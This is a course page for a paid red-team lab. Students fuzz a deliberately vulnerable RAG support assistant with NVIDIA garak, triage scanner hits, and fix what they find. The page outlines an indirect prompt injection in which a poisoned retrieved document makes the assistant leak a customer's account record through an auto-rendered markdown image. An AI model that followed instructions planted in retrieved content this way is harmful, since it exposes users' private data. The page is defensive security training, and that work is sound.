Fuzz an LLM App with garak: Run, Read, and Triage True vs False Positives
Hosted · ide
Beta

Fuzz an LLM App with garak: Run, Read, and Triage True vs False Positives

Run NVIDIA garak as an automated fuzzer against a real vulnerable RAG support assistant, read the JSONL run log and the per-probe DEFCON report, then do the skill that separates a scanner operator from a red teamer: triage the hits. Dismiss a detector false positive with evidence, confirm a genuine indirect prompt injection against an in-pod exfil listener, and watch the finding regress to zero after the fix ships.

90 min8 steps3 domainsAdvanced

Hands-on labs require Pro · $29.99/mo · cancel anytime

Map the attack surface
Query
Retriever
LLM
Poisoned doc
retrieved chunk
Answer
0%
Attack-success rate
Attacks blocked · benign answers pass
graded on real output, not the model's talk

What you'll learn

  1. 1
    Recon: stand up the vulnerable target behind an OpenAI endpoint
    You are automating red-team testing of DV-RAG-Support, ACME Cloud's
  2. 2
    Run the scan: fire a broad garak discovery battery at the endpoint
    garak runs a battery of probes (attack generators) against a generator and
  3. 3
    Read the report: count hits per probe and grade the run
    A garak run produces several artifacts:
  4. 4
    Triage a false positive: dismiss a detector hit with evidence
    Scanners over-report. The triage skill is asking, for every hit, "did the
  5. 5
    Confirm a true positive: run the custom probe, prove the effect on the listener
    A true positive is confirmed by reproducing the effect, not by trusting a
  6. 6
    Harden the render sink: allow-list the one channel the finding rode out on
    Switch hats. You confirmed a genuine finding in step 5, so now you ship the fix.
  7. 7
    Distrust the retrieved context: reframe context as data, never instructions
    The render allow-list from step 6 is the load-bearing fix: it closes the exfil
  8. 8
    Verify the regression: fixed = 0 findings, reintroduced = re-trips
    A fix only counts when you re-run the exact confirmed attack and watch it fail.

Prerequisites

  • Comfortable reading Python and JSON
  • Completed (or understand) Module 2 indirect prompt injection
  • No ML background required

Exam domains covered

Offensive AI SecurityLLM Application SecurityRed-Team Automation

Skills & technologies you'll practice

This advanced-level ai/ml lab gives you real-world reps across:

garakFuzzingRed-Team AutomationTriageFalse PositivesIndirect Prompt InjectionOWASP LLM01AI Red Team

What you'll do in this lab

This is a hands-on red-team automation lab. You point NVIDIA garak, a batteries-included LLM fuzzer and scanner, at a real Retrieval-Augmented Generation (RAG) support assistant called DV-RAG-Support and run a battery of attack probes against it. garak fires predefined attack prompts, scores each response with detectors, and writes a JSONL run log plus a per-probe DEFCON grade. Your job is the part a scanner cannot do for you: read the run and triage every hit, separating a genuine finding from a detector that merely pattern-matched.

You will dismiss a detector false positive with evidence from the run log, then confirm a genuine true positive the right way, by reproducing the effect against an in-pod exfil listener rather than trusting a detector score. The confirmed finding is an indirect prompt injection (OWASP LLM01) that leaks a customer's account record through an auto-rendered markdown image (OWASP LLM05 improper output handling), the same channel behind the real EchoLeak exploit. You finish by shipping the fix and re-running the battery to watch the finding regress to zero, the regression discipline a real red-team practice is built on.

Frequently asked questions

What is garak?

garak is NVIDIA's open-source LLM vulnerability scanner. You point it at a generator (a model or an LLM application behind an API), it runs predefined probes (attack generators), and detectors score each response. It is the discovery and fuzzing tool in a red-team toolkit: broad and opinionated, and it reports heuristic hits that you then triage.

What is the difference between a true and a false positive here?

A false positive is when a detector flags a response that did not actually achieve the attacker's goal: the model refused, or just quoted the payload, and a string-match detector counted it anyway. A true positive is a hit you can reproduce as a real effect. In this lab the true positive is an account record exfiltrating to an in-pod listener, which you confirm by reading the listener log, not by trusting a detector score.

Do I need a machine-learning background?

No. You read Python and JSON and reason about whether an attack actually fired. Everything model-specific is explained inline. The point of the lab is triage judgment and regression discipline, not model internals.